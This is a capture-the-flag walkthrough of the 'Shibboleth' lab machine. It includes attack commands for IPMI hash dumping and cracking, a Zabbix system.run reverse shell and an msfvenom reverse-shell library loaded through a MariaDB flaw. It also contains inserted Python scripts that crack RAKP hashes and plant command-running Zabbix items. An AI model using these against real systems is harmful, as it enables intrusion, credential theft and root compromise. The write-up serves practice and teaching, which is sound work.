Shibboleth — Hackthebox Walkthrough
This was a cool box that I enjoyed playing, and I learned some new things as well. I liked it very much because every step of it felt new. Thanks to knightmare & mrb3n.
Foothold/User
My initial nmap scan revealed only one port.
nmap -p- -sC -sV --min-rate=400 --min-parallelism=512 -vv shibboleth.htb
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Apache httpd 2.4.41
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: FlexStart Bootstrap Template - Index
Looking at port 80, it was a static web page (the FlexStart Bootstrap template named in the nmap output).
I tried looking for interesting things within it, but that was a bust. So I moved on to subdomain (virtual host) enumeration with ffuf and found two subdomains.
ffuf -u http://shibboleth.htb -w /usr/share/wordlists/dirb/big.txt -H "Host: FUZZ.shibboleth.htb" -fw 18
(The Host header has to be fuzzed under the target's own domain, shibboleth.htb; -fw 18 filters out the default-vhost response, which is 18 words long, so only hosts that answer differently are shown.)
I added these to my /etc/hosts file and paid them a visit. Both pointed at the same web application: a Zabbix login page.
Since I didn't have any credentials to log in with, I had no idea what to do. I tried SQL injection on the login too, but that took me nowhere. So, as always, I took a step back and went to see what I had missed.
I noticed that my nmap scan had only covered TCP ports, not UDP. So I ran a quick UDP port scan.
sudo nmap -sU -vv 10.10.11.124
PORT STATE SERVICE REASON
623/udp open asf-rmcp udp-response ttl 63
Right off the bat, I saw that UDP port 623 was open. With some research, I learned that this is IPMI (Intelligent Platform Management Interface): 623/UDP is its RMCP+ transport, and the service is normally exposed by a server's BMC, an embedded controller that provides out-of-band monitoring and management of servers and desktops. Googling it led me to a HackTricks article about attacking this service.
I followed that article and used a Metasploit module that exploits a weakness in IPMI 2.0 RAKP authentication (CVE-2013-4786): before a client is authenticated, the BMC replies with an HMAC-SHA1 over the session parameters keyed with the requested user's password, so anyone who knows a username can collect a crackable password hash for it.
sudo msfdb run
use auxiliary/scanner/ipmi/ipmi_dumphashes
set RHOSTS shibboleth.htb
run
And I was able to get the hash of the Administrator user.
Then I cracked this hash with hashcat, using mode 7300 (IPMI2 RAKP HMAC-SHA1); the module already prints the hash in the salt:hash format hashcat expects.
hashcat --force -m 7300 hash.txt /usr/share/wordlists/rockyou.txt
And I was able to retrieve the Administrator’s password as ilovepumkinpie1.
5cefdd2a82120000f2897c817ad09799d223bc451ae090db02b8fdf698384558f2ffa5b8e301c86ba123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:20ee8cfe6ebf059438a3e7efa97c7af3c574abfb:ilovepumkinpie1
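To make the hash line above concrete, here is an added Python example (my own code, not from the walkthrough, Metasploit or hashcat) that parses a hashcat mode 7300 line into its RAKP message fields, recomputes the HMAC-SHA1 for a candidate password, and runs a small wordlist pass. The field layout is the one ipmi_dumphashes emits (console session ID, BMC session ID, console random, BMC random, BMC GUID, role byte, username length, username). The wordlist and the synthetic line produced by build_rakp_line are constructed for the demo.

```python
import hashlib
import hmac
import os

# Hash line copied from this walkthrough: <salt hex>:<hmac-sha1 hex>:<cracked password>.
PAGE_HASH_LINE = (
    "5cefdd2a82120000f2897c817ad09799d223bc451ae090db02b8fdf698384558"
    "f2ffa5b8e301c86ba123456789abcdefa123456789abcdef140d41646d696e69"
    "73747261746f72:20ee8cfe6ebf059438a3e7efa97c7af3c574abfb:ilovepumkinpie1"
)


def parse_rakp_line(line):
    """Split a mode-7300 line into its RAKP fields.

    Salt layout (as emitted by Metasploit's ipmi_dumphashes):
      SIDm(4) | SIDc(4) | RandM(16) | RandC(16) | GUIDc(16) | role(1) | ulen(1) | username
    """
    salt_hex, digest_hex = line.split(":")[:2]
    salt = bytes.fromhex(salt_hex)
    if len(salt) < 58:
        raise ValueError("salt too short for an IPMI2 RAKP hash")
    ulen = salt[57]
    if len(salt) != 58 + ulen:
        raise ValueError("username length byte does not match salt length")
    return {
        "sid_m": salt[0:4],
        "sid_c": salt[4:8],
        "rand_m": salt[8:24],
        "rand_c": salt[24:40],
        "guid_c": salt[40:56],
        "role": salt[56],
        "username": salt[58:].decode("ascii"),
        "salt": salt,
        "digest": bytes.fromhex(digest_hex),
    }


def check_password(line, candidate):
    """True if HMAC-SHA1(candidate, salt) equals the digest in the line.

    RAKP keys the HMAC with the user's password (KUID), which the BMC pads with
    zeros to 20 bytes; HMAC zero-pads short keys anyway, so the raw password
    yields the same MAC.
    """
    fields = parse_rakp_line(line)
    mac = hmac.new(candidate.encode(), fields["salt"], hashlib.sha1).digest()
    return hmac.compare_digest(mac, fields["digest"])


def crack(line, wordlist):
    """Return the first word that reproduces the digest, or None."""
    for word in wordlist:
        if check_password(line, word):
            return word
    return None


def build_rakp_line(username, password, role=0x14, rand=os.urandom):
    """Construct a synthetic mode-7300 line (demo helper, random session values)."""
    if not 0 < len(username) < 256:
        raise ValueError("username length must fit in one byte")
    salt = (rand(4) + rand(4) + rand(16) + rand(16) + rand(16)
            + bytes([role, len(username)]) + username.encode("ascii"))
    digest = hmac.new(password.encode(), salt, hashlib.sha1).digest()
    return f"{salt.hex()}:{digest.hex()}"


if __name__ == "__main__":
    page = parse_rakp_line(PAGE_HASH_LINE)
    print("user from page hash:", page["username"], "role byte:", hex(page["role"]))
    demo = build_rakp_line("Administrator", "ilovepumkinpie1")
    print("synthetic line cracks to:", crack(demo, ["password", "zabbix", "ilovepumkinpie1"]))
```

Parsing the page's line shows why the module needs a username: the target account name is part of the salt, and the BMC will only hand out a hash for a name it recognises. Whether check_password reproduces the page's digest depends on the line having been transcribed exactly; the synthetic line is what the demo asserts on.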
With these credentials, I was able to login to the Zabbix application at http://monitoring.shibboleth.htb/
Username: Administrator
Password: ilovepumkinpie1
With this, I spent almost two hours enumerating the application. Since this was my first time working with Zabbix, I had no idea what to look for.
So I went to the Zabbix documentation to understand what I could do. Reading through it, I found a way to execute commands by adding an item to a host's configuration: the agent item key system.run[] runs an arbitrary command on the host that the Zabbix agent monitors.
Following the documentation, I browsed to Configuration → Hosts → Items and created a new item with the Key set to system.run[<command>,nowait]. I used my typical payload to get a shell as the command. The second argument, nowait, makes the agent return immediately instead of waiting for the command to exit; with the default wait mode the item would time out while the reverse shell is still running. The agent only honours system.run if its configuration permits it (EnableRemoteCommands=1 on older agents, or an AllowKey=system.run[*] rule on agent 5.0.2 and later), which was evidently the case here.
This was all I had to change. Then I added the item and waited for the server to poll it.
After a couple of seconds, I got a shell as the zabbix user. This user was just a service account. I saw there was a system user called ipmi-svc, and I was able to log in as ipmi-svc with the password recovered from the IPMI service (plain password reuse).
Username: ipmi-svc
Password: ilovepumkinpie1
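The item creation done above through the web UI can also be driven through the Zabbix JSON-RPC API, which is handy for repeating the step or for scripting it during an engagement. The following is an added Python example (my own code, not from the walkthrough or from Zabbix); it assumes the standard api_jsonrpc.php endpoint under the frontend URL from this box, a Zabbix 5.0-style user.login parameter named user (5.4 and later use username), a host name supplied on the command line, and an agent that permits system.run. Only the request-building functions are exercised offline; deploy_command needs the live target.

```python
import json
import sys
import urllib.request

# Frontend URL from the walkthrough plus the standard API path (assumed).
API_URL = "http://monitoring.shibboleth.htb/api_jsonrpc.php"


def rpc(method, params, auth=None, req_id=1):
    """Build one Zabbix JSON-RPC 2.0 request body."""
    body = {"jsonrpc": "2.0", "method": method, "params": params, "id": req_id}
    if auth is not None:
        body["auth"] = auth
    return body


def system_run_key(command, nowait=True):
    """Build the agent item key system.run[command,<mode>].

    Key parameters containing commas, brackets or spaces are wrapped in
    double quotes, with embedded double quotes escaped as \\". nowait makes
    the agent return at once instead of waiting for the command to exit, so
    a reverse shell does not hold the check open until it times out.
    """
    quoted = '"' + command.replace('"', '\\"') + '"'
    return f"system.run[{quoted},nowait]" if nowait else f"system.run[{quoted}]"


def login_body(user, password):
    # Zabbix 5.0 calls the parameter "user"; 5.4+ renamed it to "username"
    # (assumption: the 5.0-style name, matching the frontend on this box).
    return rpc("user.login", {"user": user, "password": password}, req_id=1)


def host_lookup_body(auth, hostname):
    """Find a host by its technical name and return its interfaces too."""
    return rpc("host.get", {
        "filter": {"host": [hostname]},
        "output": ["hostid", "host"],
        "selectInterfaces": ["interfaceid", "type"],
    }, auth=auth, req_id=2)


def item_body(auth, hostid, interfaceid, key, name="uptime check"):
    # type 0 = Zabbix agent (passive): the server polls the agent on the
    # given interface every `delay`, and the agent runs the command.
    return rpc("item.create", {
        "name": name,
        "key_": key,
        "hostid": hostid,
        "interfaceid": interfaceid,
        "type": 0,
        "value_type": 4,   # text, so whatever the command prints is accepted
        "delay": "30s",
    }, auth=auth, req_id=3)


def call(url, body):
    """POST a request body and return the JSON-RPC result (network helper)."""
    req = urllib.request.Request(
        url, data=json.dumps(body).encode(),
        headers={"Content-Type": "application/json-rpc"})
    with urllib.request.urlopen(req, timeout=15) as resp:
        reply = json.load(resp)
    if "error" in reply:
        raise RuntimeError(reply["error"])
    return reply["result"]


def deploy_command(url, user, password, hostname, command):
    """Log in, find the host's agent interface, and create the system.run item."""
    auth = call(url, login_body(user, password))
    hosts = call(url, host_lookup_body(auth, hostname))
    if not hosts:
        raise RuntimeError(f"no host named {hostname!r}")
    # Interface type "1" is the Zabbix agent (API returns numbers as strings).
    agent_ifaces = [i for i in hosts[0]["interfaces"] if i["type"] == "1"]
    if not agent_ifaces:
        raise RuntimeError("host has no Zabbix agent interface")
    key = system_run_key(command)
    return call(url, item_body(auth, hosts[0]["hostid"], agent_ifaces[0]["interfaceid"], key))


if __name__ == "__main__":
    # usage: python3 zabbix_run.py <user> <password> <hostname> <command>
    user, password, hostname, command = sys.argv[1:5]
    print(deploy_command(API_URL, user, password, hostname, command))
```

The item lands on whichever host you name, and the command runs under the agent's account on that host (the zabbix user here), so the resulting shell has exactly the privileges the UI route gave. Deleting the item afterwards (item.delete with the returned itemids) keeps the server from re-running the payload every 30 seconds.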
Root
Looking around the file system, I found the Zabbix server config at /etc/zabbix/zabbix_server.conf, and it contained the database credentials (the DBUser and DBPassword directives).
cat /etc/zabbix/zabbix_server.conf | grep -v "^#"
Username: zabbix
Password: bloooarskybluh
Looking at the listening ports, I saw that MySQL (MariaDB) was listening on port 3306.
ss -tlnp
So I logged in with the credentials above and enumerated the databases. I found some password hashes in the zabbix database and tried to crack them, but that took forever and gave me nothing.
Again I took a step back to see what I had missed, and one thing was that the MariaDB version was a little old.
Looking for exploits for that version, I found CVE-2021-27928. The CVE describes the vulnerability as:
"An untrusted search path leads to eval injection, in which a database SUPER user can execute OS commands after modifying wsrep_provider and wsrep_notify_cmd." In practice: wsrep_provider names a shared library that mysqld loads with dlopen, so a user with the SUPER privilege can point it at any .so on disk and get that library's constructor executed inside the database server process.
I found a GitHub repo with a proof of concept for this vulnerability.
Following its steps, I first built a shared object with msfvenom that connects back with a shell when loaded:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.15.21 LPORT=443 -f elf-so -o test.so
Then I started a listener on port 443 and transferred the file to /tmp on the box. Then, as in the PoC, I logged in to MariaDB with the zabbix credentials and set the variable:
mysql -u zabbix -p
SET GLOBAL wsrep_provider="/tmp/test.so";
And I got a shell back as root. Setting wsrep_provider makes mysqld load the library immediately, so the payload runs with whatever privileges the database server process has; on this box that was root. Note that the account setting the variable needs the SUPER privilege, which the zabbix database user had.
Rooted!!!
“If you have any questions, make sure to leave them down in the comments, or contact me through social media.”
Email — iamkavigihan@gmail.com
Instagram — https://www.instagram.com/_kavi.gihan/
Happy Hacking !!! 😄